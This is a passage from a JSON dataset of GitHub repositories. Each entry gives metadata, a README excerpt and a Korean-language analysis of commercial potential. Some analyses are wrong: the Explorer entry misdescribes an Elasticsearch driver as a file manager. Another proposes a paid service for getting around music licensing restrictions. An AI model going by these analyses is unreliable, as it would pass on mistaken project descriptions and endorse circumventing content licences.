office](https://workadventu.re/virtual-offices/virtual-meetings/?utm_source=github)!**\n\n**Pricing for our [SaaS version](https://wo","composite_score":0.0361,"license_safety_tag":"unknown"},{"name":"adonisjs/adonis-framework","github_url":"https://github.com/adonisjs/adonis-framework","stars":8,"language":"TypeScript","license":"mit","abandonment_months":1,"description":"# Adonis Framework 상업화 분석\n\n## 왜 보물인가\n웹사이트와 앱을 빠르게 만들 수 있게 도와주는 개발 도구로, 프로그래머의 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 예약 관리 플랫폼, 프로젝트 관리 도구 등 웹 기반 서비스 개발 가속화\n- 빠른 시장 진출과 기능 추가가 가능합니다\n\n**2. 내","readme_excerpt":"# @adonisjs/core\n\n**Featured sponsors**\n\n<table>\n\n<tr>\n<td>\n\n<a href=\"https://route4me.com/?utm_source=adonisjs.com\">\n  <img src=\"https://raw.githubusercontent.com/thetutlage/static/refs/heads/main/featured_sponsors/logos/route4me.jpg\" />\n</a>\n\n</td>\n\n<td>\n\n<a href=\"https://ezycourse.com/?utm_source=adonisjs.com\">\n  <img src=\"https://raw.githubusercontent.com/thetutlage/static/refs/heads/main/featured_sponsors/logos/ezycourse.jpg\" />\n</a>\n\n</td>\n\n</tr>\n\n<tr>\n\n<td>\n\n<a href=\"https://meteor.software/g6h?utm_source=adonisjs.com\">\n  <img src=\"https://raw.githubusercontent.com/thetutlage/static/refs/heads/main/featured_sponsors/logos/galaxy.jpg\" />\n</a>\n\n</td>\n\n<td>\n\n<a href=\"https://www.testmuai.com/?utm_source=adonisjs.com\">\n  <img src=\"https://raw.githubusercontent.com/thetutlage/static/refs/heads/main/featured_sponsors/logos/testmu.jpg\" />\n</a>\n\n</td>\n\n</tr>\n\n<tr>\n\n<td>\n\n<a href=\"https://relancer.com/?utm_source=adonisjs.com\">\n  <img src=\"https://raw.githubusercontent.com/thetutlage/sta","composite_score":0.0361,"license_safety_tag":"safe"},{"name":"1715173329/UnblockNeteaseMusic","github_url":"https://github.com/1715173329/UnblockNeteaseMusic","stars":8,"language":"JavaScript","license":"LGPL-3.0","abandonment_months":1,"description":"# UnblockNeteaseMusic 상용화 분석\n\n## 왜 보물인가\n중국 내 음악 스트리밍 서비스의 지역 제한을 우회하여 모든 노래에 접근할 수 있게 해주는 솔루션으로, 음악 팬들의 실질적인 문제를 해결합니다.\n\n## 어디에 쓸 수 있나\n1. **음악 스트리밍 프록시 서비스**: 월 구독 모델로 제한된 노래 재생 권한을 자동으로 해제해주는 SaaS\n2.","readme_excerpt":"<!-- Thanks to https://zhconvert.org's Chinese (China) converter ! -->\n\n<img src=\"https://user-images.githubusercontent.com/26399680/47980314-0e3f1700-e102-11e8-8857-e3436ecc8beb.png\" alt=\"logo\" width=\"140\" height=\"140\" align=\"right\">\n\n# UnblockNeteaseMusic\n\n解锁网易云音乐客户端变灰歌曲\n\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2FUnblockNeteaseMusic%2Fserver.svg?type=shield)](https://app.fossa.com/projects/git%2Bgithub.com%2FUnblockNeteaseMusic%2Fserver?ref=badge_shield)\n\n## 特性\n\n- 支援多个音源，替换变灰歌曲链接\n    - 支援的完整音源清单可以见下方〈音源清单〉处。\n- 为请求增加 `X-Real-IP` 参数解锁海外限制，支持指定网易云服务器 IP，支持设置上游 HTTP / HTTPS 代理\n- 完整的流量代理功能 (HTTP / HTTPS)，可直接作为系统代理 (同时支持 PAC)\n\n## 运行\n\n### 直接打开可运行文件\n\n去右侧的 Releases 找到最新版本，然后在下方的 Assets 找到符合你系统架构的可运行文件。下载回来后点两下即可使用。\n\n> macOS 因为签名问题，暂时不提供可运行文件。请先按照其他做法使用。\n\n### NPM 安装\n\n#### 安装成依赖\n\n```bash\nnpm install @unblockneteasemusic/server\nyarn add @unblockneteasemusic/server # for Yarn users\n```\n\n#### 用 NPX 运行\n\n```bash\nnpx -p @unblockneteasemusic/server unblockneteasemusic\n```\n","composite_score":0.0361,"license_safety_tag":"restricted"},{"name":"ldsec/lattigo","github_url":"https://github.com/ldsec/lattigo","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":1,"description":"# Lattigo 저장소 분석\n\n## 왜 보물인가\n은행, 병원, 정부처럼 극도로 민감한 데이터를 다루는 조직들이 데이터를 암호화한 상태에서도 분석할 수 있게 해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **의료 데이터 분석 SaaS**: 병원들이 환자 정보를 숨긴 채로 질병 패턴 분석을 의뢰하고 결과만 받는 서비스\n2. **금융 리스크 평가 ","readme_excerpt":"# Lattigo: lattice-based multiparty homomorphic encryption library in Go\n\n<p align=\"center\">\n\t<img src=\"logo.png\" />\n</p>\n\n![Go tests](https://github.com/tuneinsight/lattigo/actions/workflows/ci.yml/badge.svg)\n\nLattigo is a Go module that implements full-RNS Ring-Learning-With-Errors-based homomorphic-encryption\nprimitives and Multiparty-Homomorphic-Encryption-based secure protocols. The library features:\n\n- Optimized arithmetic for power-of-two cyclotomic rings.\n- Advanced and scheme-agnostic implementation of RLWE-based primitives, key-generation, and their multiparty version.\n- Implementation of the BFV/BGV and CKKS schemes and their multiparty version.\n- Support for RGSW, external product and LMKCDEY blind rotations.\n- A pure Go implementation, enabling cross-platform builds, including WASM compilation for\nbrowser clients, with comparable performance to state-of-the-art C++ libraries.\n\nLattigo is meant to support HE in distributed systems and microservices architectures, for which ","composite_score":0.0361,"license_safety_tag":"safe"},{"name":"davidwernhart/AlDente","github_url":"https://github.com/davidwernhart/AlDente","stars":10,"language":"Swift","license":"NOASSERTION","abandonment_months":1,"description":"# AlDente 저장소 분석\n\n## 왜 보물인가\nMac 사용자들의 배터리 수명을 똑똑하게 관리해주는 실용적인 도구로, 기술 문제를 일상의 불편함으로 해결한 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 구독형 배터리 관리 앱으로 월간 구독료 수금\n2. **기업용 내부 도구**: 회사 Mac 자산 관리 시스템에 통합하여 장비","readme_excerpt":"<div align=\"center\">\n    <img src=\"AlDente/Assets.xcassets/AppIcon.appiconset/512pt_Mac_1x.png\" width=200 height=200>\n    <h1>AlDente - Battery Care & Monitoring</h1>\n</div>\n\n_MacOS menu bar tool to limit maximum charging percentage and improve battery lifespan_\n\n#### Don't overcook your battery! Keep it fresh and chewy with AlDente.\n\n## Why do I need this?\nLi-Ion batteries (like the one in your MacBook) last the longest when operating between 20 and 80 percent. Keeping your battery at 100% at all times can shorten the lifespan of your MacBook significantly.\nMore information can be found at [Battery University](https://batteryuniversity.com/article/bu-415-how-to-charge-and-when-to-charge).\n\n## What’s AlDente Pro?\nAlDente Pro is our paid version of AlDente. It has many more features such as Heat Protection, Sailing Mode, Top Up, Calibration Mode,... It offers a better design and has live status icons. If you are interested in getting the most out of your battery, check out our [website]","composite_score":0.036,"license_safety_tag":"unknown"},{"name":"ethereum/viper","github_url":"https://github.com/ethereum/viper","stars":5,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# Ethereum Viper 저장소 분석\n\n## 왜 보물인가\n블록체인 기술의 핵심인 스마트 계약을 안전하게 만들 수 있는 프로그래밍 언어로, 암호화폐와 디지털 자산 거래를 더 신뢰할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 블록체인 기반 거래 플랫폼을 구축할 때 사용하는 개발 도구로 월 구독료 징수\n2. **내","readme_excerpt":"<img src=\"https://raw.githubusercontent.com/vyperlang/vyper/master/docs/logo.svg?sanitize=true\" alt=\"\" width=\"110\">\n\n[![Build Status](https://github.com/vyperlang/vyper/actions/workflows/test.yml/badge.svg)](https://github.com/vyperlang/vyper/actions/workflows/test.yml)\n[![Documentation Status](https://readthedocs.org/projects/vyper/badge/?version=latest)](http://docs.vyperlang.org/en/latest/?badge=latest \"ReadTheDocs\")\n[![Discord](https://img.shields.io/discord/969926564286459934.svg?label=%23vyper)](https://discord.gg/6tw7PTM7C2)\n[![Telegram](https://img.shields.io/badge/Vyperholics🐍-Telegram-blue)](https://t.me/vyperlang)\n[![Twitter](https://img.shields.io/twitter/follow/vyperlang)](https://x.com/vyperlang)\n\n[![PyPI](https://badge.fury.io/py/vyper.svg)](https://pypi.org/project/vyper \"PyPI\")\n[![Docker](https://img.shields.io/docker/cloud/build/vyperlang/vyper)](https://hub.docker.com/r/vyperlang/vyper \"DockerHub\")\n\n[![Coverage Status](https://codecov.io/gh/vyperlang/vyper/branch/mas","composite_score":0.036,"license_safety_tag":"unknown"},{"name":"Jeroen-G/Explorer","github_url":"https://github.com/Jeroen-G/Explorer","stars":10,"language":"PHP","license":"MIT","abandonment_months":2,"description":"# Jeroen-G/Explorer 상용화 분석\n\n## 왜 보물인가\n파일과 폴더를 쉽게 탐색하고 관리할 수 있는 도구로, 복잡한 데이터 구조를 직관적으로 다룰 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **클라우드 스토리지 서비스**: 사용자가 파일을 업로드하고 정리하는 웹 인터페이스로 활용\n- **기업용 문서 관리 시스템**: 회사 직원들이 공유 ","readme_excerpt":"# Explorer\n\n[![Latest Version on Packagist][ico-version]][link-packagist]\n\n[![CI](https://github.com/Jeroen-G/Explorer/actions/workflows/ci.yml/badge.svg)](https://github.com/Jeroen-G/Explorer/actions/workflows/ci.yml)\n\nNext-gen Elasticsearch driver for Laravel Scout with the power of Elasticsearch's queries.\n\n## Installation\n\nVia Composer\n\n``` bash\ncomposer require jeroen-g/explorer\n```\n\nYou will need the configuration file to define your indexes:\n\n```bash\nphp artisan vendor:publish --tag=explorer.config\n```\n\nAlso do not forget to follow the [installation instructions for Laravel Scout](https://laravel.com/docs/scout#installation),\nand in your Laravel Scout config, set the driver to `elastic`. \n\n## Usage\n\nBe sure to also have a look at the [docs](docs/index.md) to see what is possible!\nThere is also a [demo app](https://github.com/Jeroen-G/explorer-demo) available that might be insightful.\n\n### Configuration\n\nYou may either define the mapping for you index in the config file:\n\n```php\n","composite_score":0.0359,"license_safety_tag":"safe"},{"name":"SlimeVR/SlimeVR-Tracker-ESP","github_url":"https://github.com/SlimeVR/SlimeVR-Tracker-ESP","stars":6,"language":"C++","license":"Apache-2.0","abandonment_months":1,"description":"# SlimeVR-Tracker-ESP 상용화 분석\n\n## 왜 보물인가\n몸의 움직임을 감지하는 저렴한 센서 기술로, 게임·영상·운동 분석 등 다양한 산업에서 고가 장비를 대체할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **VR 피트니스 앱 (SaaS)**: 홈트레이닝 서비스에서 사용자의 정확한 움직임을 추적하여 운동 자세 교정 기능 제공\n2. **게","readme_excerpt":"# SlimeVR Tracker firmware for ESP\n\nFirmware for ESP8266 / ESP32 microcontrollers and different IMU sensors to use them as a vive-like trackers in VR.\n\nRequires [SlimeVR Server](https://github.com/SlimeVR/SlimeVR-Server) to work with SteamVR and resolve pose. Should be compatible with [owoTrack](https://github.com/abb128/owo-track-driver), but is not guaranteed.\n\n## Configuration\n\nFirmware configuration is located in the `defines.h` file. For more information on how to configure your firmware, refer to the [Configuring the firmware project section of SlimeVR documentation](https://docs.slimevr.dev/firmware/configuring-project.html).\n\n## Compatibility\n\nThe following IMUs and their corresponding `IMU` values are supported by the firmware:\n* BNO085 & BNO086 (IMU_BNO085)\n  * Using any fusion in internal DMP. Best results with ARVR Stabilized Game Rotation Vector or ARVR Stabilized Rotation Vector if in good magnetic environment.\n* BNO080 (IMU_BNO080)\n  * Using any fusion in internal DMP. D","composite_score":0.0357,"license_safety_tag":"safe"},{"name":"sixtyfpsui/sixtyfps","github_url":"https://github.com/sixtyfpsui/sixtyfps","stars":15,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"# sixtyfpsui/sixtyfps 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 없이 아름다운 화면을 빠르게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 자신의 웹 애플리케이션 화면을 빠르게 프로토타입하고 배포하는 데 사용\n2. **내부 업무 도구**: 대기업의 HR팀이 직원 관리 시스템 같은 사내 도구의","readme_excerpt":"\n![Slint](./logo/slint-logo-full-light.svg#gh-light-mode-only) ![Slint](./logo/slint-logo-full-dark.svg#gh-dark-mode-only)\n\n[![Build Status](https://github.com/slint-ui/slint/workflows/CI/badge.svg)](https://github.com/slint-ui/slint/actions)\n[![REUSE status](https://api.reuse.software/badge/github.com/slint-ui/slint)](https://api.reuse.software/info/github.com/slint-ui/slint)\n[![Discussions](https://img.shields.io/github/discussions/slint-ui/slint)](https://github.com/slint-ui/slint/discussions)\n\n**Slint** is an open-source declarative GUI toolkit for building native user interfaces for embedded systems, desktops, and mobile platforms.\n\nWrite your UI once in `.slint`, a simple markup language. Connect it to business logic written in Rust, C++, JavaScript, or Python.\n\n## Why Slint?\n\nThe name *Slint* is derived from our design goals:\n\n- **Scalable**: Slint should support responsive UI design, allow cross-platform\n    usage across operating systems and processor architectures and support","composite_score":0.0356,"license_safety_tag":"unknown"},{"name":"linkedin/Burrow","github_url":"https://github.com/linkedin/Burrow","stars":7,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# LinkedIn Burrow 분석 보고서\n\n## 왜 보물인가\nLinkedIn이 만든 메시지 큐 모니터링 도구로, 기업의 데이터 흐름을 건강하게 유지하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 데이터 처리 회사들이 \"메시지 큐 상태 모니터링 플랫폼\"으로 월 구독 판매\n2. **내부 업무 도구**: 대규모 데이터센터를","readme_excerpt":"[![Release](https://img.shields.io/github/v/release/linkedin/Burrow)](https://github.com/linkedin/Burrow/releases)\n[![Join the chat at https://gitter.im/linkedin-Burrow/Lobby](https://badges.gitter.im/linkedin-Burrow/Lobby.svg)](https://gitter.im/linkedin-Burrow/Lobby?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Build Status](https://github.com/linkedin/Burrow/actions/workflows/ci.yml/badge.svg)](https://github.com/linkedin/Burrow/actions/workflows/ci.yml)\n[![go report card](https://goreportcard.com/badge/github.com/linkedin/Burrow)](https://goreportcard.com/report/github.com/linkedin/Burrow)\n[![Coverage Status](https://coveralls.io/repos/github/linkedin/Burrow/badge.svg?branch=master)](https://coveralls.io/github/linkedin/Burrow?branch=master)\n[![GoDoc](https://godoc.org/github.com/linkedin/Burrow?status.svg)](https://godoc.org/github.com/linkedin/Burrow)\n\n# Burrow - Kafka Consumer Lag Checking\n\n\nBurrow is a monitoring companion for [Apache Kafka](http","composite_score":0.0352,"license_safety_tag":"safe"},{"name":"wandb/client","github_url":"https://github.com/wandb/client","stars":18,"language":"Python","license":"mit","abandonment_months":0,"description":"# wandb/client 시장 분석\n\n## 왜 보물인가\n머신러닝 모델 개발 과정을 자동으로 기록하고 관리해주는 도구로, 데이터 과학자들이 실험 결과를 쉽게 추적하고 비교할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **AI 개발사 내부 도구**: 머신러닝 팀이 모델 실험 결과를 중앙에서 관리하는 협업 플랫폼으로 운영\n2. **AI 교육 플랫폼 기","readme_excerpt":"<p align=\"center\">\n  <img src=\"./assets/logo.svg\" width=\"600\" alt=\"Weights & Biases\" />\n</p>\n\n<p align=\"center\">\n<a href=\"https://pypi.python.org/pypi/wandb\"><img src=\"https://img.shields.io/pypi/v/wandb\" /></a>\n<a href=\"https://anaconda.org/conda-forge/wandb\"><img src=\"https://img.shields.io/conda/vn/conda-forge/wandb\" /></a>\n<a href=\"https://pypi.python.org/pypi/wandb\"><img src=\"https://img.shields.io/pypi/pyversions/wandb\" /></a>\n<a href=\"https://circleci.com/gh/wandb/wandb\"><img src=\"https://img.shields.io/circleci/build/github/wandb/wandb/main\" /></a>\n<a href=\"https://codecov.io/gh/wandb/wandb\"><img src=\"https://img.shields.io/codecov/c/gh/wandb/wandb\" /></a>\n</p>\n<p align='center'>\n<a href=\"https://colab.research.google.com/github/wandb/examples/blob/master/colabs/intro/Intro_to_Weights_%26_Biases.ipynb\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" /></a>\n</p>\n\nUse W&B to build better models faster. Track and visualize all the pieces of your machine learnin","composite_score":0.0352,"license_safety_tag":"safe"},{"name":"collabH/repository","github_url":"https://github.com/collabH/repository","stars":5,"language":"Python","license":"MIT","abandonment_months":1,"description":"# collabH/repository 분석 보고서\n\n## 왜 보물인가\n저장소 정보가 극히 제한적이어서 실질적인 가치 판단이 어렵지만, MIT 라이선스와 지속적인 관리(최근 커밋 2026-04-18)는 신뢰성 있는 오픈소스 프로젝트임을 시사합니다.\n\n## 어디에 쓸 수 있나\n**1. 팀 협업 도구 (SaaS):** 팀원들이 함께 작업하는 과정을 자동화하고 관","readme_excerpt":"![img.png](./img/logo.png)\n\n# 大数据知识库 (BigData Knowledge Repository)\n\n[![License](https://img.shields.io/badge/license-MIT-green.svg)](https://opensource.org/licenses/MIT/)\n\n[![GitHub Stars](https://img.shields.io/github/stars/collabH/repository?style=social)](https://github.com/collabH/repository)\n\n[![Fork](https://img.shields.io/github/forks/collabH/repository?style=social)](https://github.com/collabH/repository/fork)\n\n## 概述\n\n* 个人学习知识库涉及到数据仓库建模、实时计算、大数据、Java、算法等。\n* [在线文档](https://shimin-huang.gitbook.io/doc/)\n\n## 🤖 AI知识库助手\n\n本项目集成了 **大数据知识库AI Skill助手**，可以帮助您：\n\n- **📚 知识复习**：基于Flink、Spark、Hadoop、数据仓库、数据湖等知识库提供智能复习指导\n- **💼 面试准备**：提供大数据技术面试问题解答和面试技巧\n- **🎯 学习路径**：根据您的需求制定个性化的学习计划和路径\n- **❓ 问题解答**：解答大数据相关技术问题，提供详细解释和示例\n\n### 使用方法\n\n在支持的AI平台上激活 `bigdata-knowledge-coach` Skill，然后您可以：\n\n```\n# 询问技术问题\n\"请帮我解释Flink的Checkpoint机制\"\n\n# 请求面试准备\n\"准备一下Spark Streaming的面试题\"\n\n# 学习规划\n\"我想学习数据仓库，请给出学习路径\"\n\n# 知识点复习\n\"帮我复习Hive的调优策略\"\n```\n\n## RoadMap\n\n![roadMap](./roadmap/roadmap.jpg)\n\n## 基础能力\n\n### 数据结构\n\n* [数据结构概述](base/d","composite_score":0.0351,"license_safety_tag":"safe"},{"name":"vhyrro/neorg","github_url":"https://github.com/vhyrro/neorg","stars":7,"language":"Lua","license":"GPL-3.0","abandonment_months":2,"description":"# Neorg 프로젝트 분석\n\n## 왜 보물인가\n복잡한 문서와 정보를 깔끔하게 정리하고 연결해주는 새로운 방식의 조직 도구로, 생각을 체계적으로 관리하고 싶은 전문가들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 프리랜서와 소규모 팀을 위한 월 구독형 문서 관리 플랫폼으로 온라인 서비스 제공\n2. **내부 업무 도구**: 대","readme_excerpt":"<div align=\"center\">\n\n<img src=\"res/neorg.svg\" width=300>\n\n# Neorg - An Organized Future\n\n<a href=\"https://neovim.io\"> ![Neovim](https://img.shields.io/badge/Neovim%200.10+-brightgreen?style=for-the-badge) </a>\n<a href=\"https://chat.neorg.org\"> ![Zulip](https://img.shields.io/badge/zulip-join-6492fe?style=for-the-badge&logo=zulip) </a>\n<a href=\"https://discord.gg/T6EgTAX7ht\"> ![Discord](https://img.shields.io/badge/discord-join-7289da?style=for-the-badge&logo=discord) </a>\n<a href=\"/LICENSE\"> ![License](https://img.shields.io/badge/license-GPL%20v3-brightgreen?style=for-the-badge)</a>\n<a href=\"https://dotfyle.com/plugins/nvim-neorg/neorg\"> ![Usage](https://dotfyle.com/plugins/nvim-neorg/neorg/shield?style=for-the-badge) </a>\n\nYour New Life Organization Tool - All in Lua\n\n[Tutorial](#-tutorial)\n•\n[Roadmap](/ROADMAP.md)\n•\n[Installation](#-installation)\n•\n[Further Learning](#-further-learning)\n<br>\n[Credits](#credits)\n•\n[Support](#support)\n\n</div>\n\n<div align=\"center\">\n\n<br>\n\n**:warning: ","composite_score":0.0351,"license_safety_tag":"restricted"},{"name":"acidanthera/VirtualSMC","github_url":"https://github.com/acidanthera/VirtualSMC","stars":5,"language":"C++","license":"BSD-3-Clause","abandonment_months":2,"description":"# VirtualSMC 상용화 분석\n\n## 왜 보물인가\nMac 컴퓨터를 가상화하거나 제어하고 싶어하는 수백만 명의 사용자들을 위해 필수적인 핵심 기술을 제공하는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n**1. Mac 가상화 관리 SaaS**\n- 기업이 여러 개의 가상 Mac을 클라우드에서 관리하고 운영할 수 있는 웹 기반 서비스\n- 개발자나 ","readme_excerpt":"VirtualSMC\n========\n\n[![Build Status](https://github.com/acidanthera/VirtualSMC/actions/workflows/main.yml/badge.svg?branch=master)](https://github.com/acidanthera/VirtualSMC/actions) [![Scan Status](https://scan.coverity.com/projects/16571/badge.svg?flat=1)](https://scan.coverity.com/projects/16571)\n\nAdvanced Apple SMC emulator in the kernel. Requires [Lilu](https://github.com/vit9696/Lilu) for full functioning.\n\nEnglish (Current)  \n[简体中文](README_zh.md)  \n\n#### Features\n- Supports macOS 10.4 and newer (10.9 and newer is recommended)\n- Implements MMIO protocol and interrupt-based responses for compatibility with modern OS\n- Properly reports key attributes and r/w protection in the keys\n- Allows tuning on per-model basis and allows to use different SMC generations\n- Extensible by the plugins for sensor and key addition support\n- Enables `smcdebug=XX` boot argument support on 10.9\n- Replaces hardware SMC it finds (to disable SMC entirely you need to flash a dedicated firmware)\n\n#### Boot","composite_score":0.0346,"license_safety_tag":"safe"},{"name":"aaPanel/aaPanel","github_url":"https://github.com/aaPanel/aaPanel","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":1,"description":"# aaPanel 저장소 분석\n\n## 왜 보물인가\n웹사이트를 운영하는 사람들이 복잡한 기술 없이 서버를 쉽게 관리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 웹사이트 호스팅 업체들이 고객에게 제공하는 자동화 관리 플랫폼\n2. **내부 업무 도구**: 웹 개발회사의 기술팀이 여러 클라이언트 서버를 한 곳에서 통제","readme_excerpt":"<div align=\"center\">\n  <img src=\"https://www.aapanel.com/images/bt_logo.png\" alt=\"aaPanel \" width=\"270\"/>\n</div>\n<br/>\n\n<div align=\"center\">\n<img src=\"https://forum.aapanel.com/assets/logo-kr3kouky.png\" alt=\"aaPanel \" width=\"120\"/>\n</div>\n<br/>\n<div align=\"center\">\n\n[![BTWAF](https://img.shields.io/badge/aaPanel-aaPanel-blue)](https://github.com/aaPanel/aaPanel)\n[![social](https://img.shields.io/github/stars/aaPanel/aaPanel?style=social)](https://github.com/aaPanel/aaPanel)\n\n</div>\n<p align=\"center\">\n  <a href=\"https://www.aapanel.com\">Official</a> | \n  <a href=\"https://doc.aapanel.com/web/#/3?page_id=117\">documentation</a> |\n  <a href=\"https://demo.aapanel.com/fdgi87jbn/\">Demo</a> |\n</p>\n\n## About aaPanel\n\n**aaPanel is a simple but powerful hosting control panel**, it can manage the web server through web-based GUI(Graphical User Interface).\n\n* **one-click function:** such as one-click install LNMP/LAMP developing environment and software.\n* **save the time:** Our main goal is helping","composite_score":0.0345,"license_safety_tag":"unknown"},{"name":"bfirsh/jsnes","github_url":"https://github.com/bfirsh/jsnes","stars":14,"language":"JavaScript","license":"apache-2.0","abandonment_months":0,"description":"# bfirsh/jsnes 보물 분석\n\n## 왜 보물인가\n옛날 게임기(닌텐도)의 게임을 웹 브라우저에서 바로 즐길 수 있게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **추억 게임 플랫폼 SaaS**: \"복고 게임을 구독으로 즐기는 서비스\" - 월 정액료를 받고 옛 게임들을 온라인으로 제공\n2. **교육용 내부 도구**: 프로그래밍 학원이나 ","readme_excerpt":"# JSNES\n\nA JavaScript NES emulator.\n\nIt's a library that works in both the browser and Node.js.\n\n## Installation\n\nFor Node.js or Webpack:\n\n    $ npm install jsnes\n\n\nIn the browser, you can use [unpkg](https://unpkg.com):\n\n```html\n<script type=\"text/javascript\" src=\"https://unpkg.com/jsnes@2/dist/jsnes.min.js\"></script>\n```\n\n## Usage\n\n### Browser\n\nThe easiest way to use JSNES in a web page is with `jsnes.Browser`. It handles canvas rendering, audio, keyboard input, gamepad input, and frame timing automatically.\n\n```html\n<div id=\"nes\" style=\"width: 512px; height: 480px\"></div>\n<script src=\"https://unpkg.com/jsnes@2/dist/jsnes.min.js\"></script>\n<script>\n  var browser = new jsnes.Browser({\n    container: document.getElementById(\"nes\"),\n    onError: function (e) {\n      console.error(e);\n    },\n  });\n  jsnes.Browser.loadROMFromURL(\"my-rom.nes\", function (err, data) {\n    if (err) {\n      console.error(err);\n      return;\n    }\n    browser.loadROM(data);\n  });\n</script>\n```\n\nIf you already h","composite_score":0.0344,"license_safety_tag":"safe"},{"name":"yuin/goldmark","github_url":"https://github.com/yuin/goldmark","stars":18,"language":"Go","license":"mit","abandonment_months":2,"description":"","readme_excerpt":"goldmark\n==========================================\n\n[![https://pkg.go.dev/github.com/yuin/goldmark](https://pkg.go.dev/badge/github.com/yuin/goldmark.svg)](https://pkg.go.dev/github.com/yuin/goldmark)\n[![https://github.com/yuin/goldmark/actions?query=workflow:test](https://github.com/yuin/goldmark/actions/workflows/test.yaml/badge.svg?branch=master&event=push)](https://github.com/yuin/goldmark/actions?query=workflow:test)\n[![https://coveralls.io/github/yuin/goldmark](https://coveralls.io/repos/github/yuin/goldmark/badge.svg?branch=master)](https://coveralls.io/github/yuin/goldmark)\n[![https://goreportcard.com/report/github.com/yuin/goldmark](https://goreportcard.com/badge/github.com/yuin/goldmark)](https://goreportcard.com/report/github.com/yuin/goldmark)\n\n> A Markdown parser written in Go. Easy to extend, standards-compliant, well-structured.\n\ngoldmark is compliant with CommonMark 0.31.2.\n\n- [goldmark playground](https://yuin.github.io/goldmark/playground/) : Try goldmark online. Thi","composite_score":0.0343,"license_safety_tag":"safe"},{"name":"fosscord/fosscord","github_url":"https://github.com/fosscord/fosscord","stars":5,"language":"","license":"AGPL-3.0","abandonment_months":2,"description":"# Fosscord 상품화 분석\n\n## 왜 보물인가\nDiscord 같은 메신저 플랫폼을 누구든 직접 만들고 운영할 수 있게 하는 오픈소스 프로젝트로, 거대 기업에 종속되지 않은 독립적인 커뮤니케이션 인프라를 원하는 조직들에게 매력적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 내부 커뮤니케이션 SaaS**\n- 대기업이 직원 간 메시지, 파일 공유를 위","readme_excerpt":"<p align=\"center\">\n\n  <img width=\"100\" src=\"https://avatars.githubusercontent.com/u/75180178?s=200&v=4\" />\n\n</p>\n<h1 align=\"center\">Spacebar</h1>\n\n<p align=\"center\">\n   <a href=\"https://discord.gg/ZrnGQP6p3d\">\n    <img src=\"https://img.shields.io/discord/806142446094385153?color=7489d5&logo=discord&logoColor=ffffff\" />\n  </a>\n  <img src=\"https://img.shields.io/static/v1?label=Status&message=Development&color=blue\">\n  <a title=\"Crowdin\" target=\"_blank\" href=\"https://translate.spacebar.chat/\"><img src=\"https://badges.crowdin.net/fosscord/localized.svg\"></a>\n  <a href=\"https://opencollective.com/spacebar\">\n    <img src=\"https://opencollective.com/spacebar/tiers/badge.svg\">\n  </a>\n</p>\n\n### [About](https://spacebar.chat/)\n\nSpacebar is a free, opensource selfhostable discord-compatible chat, voice and video platform.\n\n* **Discord-compatible** (Use all your custom clients/bots with minimal changes)\n* **Selfhostable** ([Server](https://github.com/spacebarchat/server))\n* **Open Source** ([GitH","composite_score":0.0343,"license_safety_tag":"risky"},{"name":"cornellius-gp/gpytorch","github_url":"https://github.com/cornellius-gp/gpytorch","stars":6,"language":"Python","license":"MIT","abandonment_months":1,"description":"# GPyTorch 저장소 분석\n\n## 왜 보물인가\n복잡한 통계 예측 문제를 빠르고 정확하게 푸는 도구로, 금융·의료·날씨 예측 같은 고부가가치 산업에서 핵심 기술로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: AI 기반 투자 분석 플랫폼**\n- 주식/암호화폐 가격 변동을 예측하는 구독형 서비스로, 월 99~299달러에 투자","readme_excerpt":"# GPyTorch\n\n---\n[![Test Suite](https://github.com/cornellius-gp/gpytorch/actions/workflows/run_test_suite.yml/badge.svg)](https://github.com/cornellius-gp/gpytorch/actions/workflows/run_test_suite.yml)\n[![Documentation Status](https://readthedocs.org/projects/gpytorch/badge/?version=latest)](https://gpytorch.readthedocs.io/en/latest/?badge=latest)\n[![License](https://img.shields.io/badge/license-MIT-green.svg)](LICENSE)\n\n[![Python Version](https://img.shields.io/badge/python-3.10+-blue.svg)](https://www.python.org/downloads/)\n[![Conda](https://img.shields.io/conda/v/gpytorch/gpytorch.svg)](https://anaconda.org/gpytorch/gpytorch)\n[![PyPI](https://img.shields.io/pypi/v/gpytorch.svg)](https://pypi.org/project/gpytorch)\n\nGPyTorch is a Gaussian process library implemented using PyTorch. GPyTorch is designed for creating scalable, flexible, and modular Gaussian process models with ease.\n\nInternally, GPyTorch differs from many existing approaches to GP inference by performing most inference o","composite_score":0.0341,"license_safety_tag":"safe"},{"name":"microsoft/azure_arc","github_url":"https://github.com/microsoft/azure_arc","stars":7,"language":"HTML","license":"CC-BY-4.0","abandonment_months":1,"description":"# Microsoft Azure Arc 저장소 분석\n\n## 왜 보물인가\nMicrosoft가 만든 공식 자료로, 기업의 여러 컴퓨터 환경을 한 곳에서 관리할 수 있는 기술을 설명하고 있어 기업 IT 운영 비용 절감에 직결됩니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 고객들이 자신의 여러 사무실, 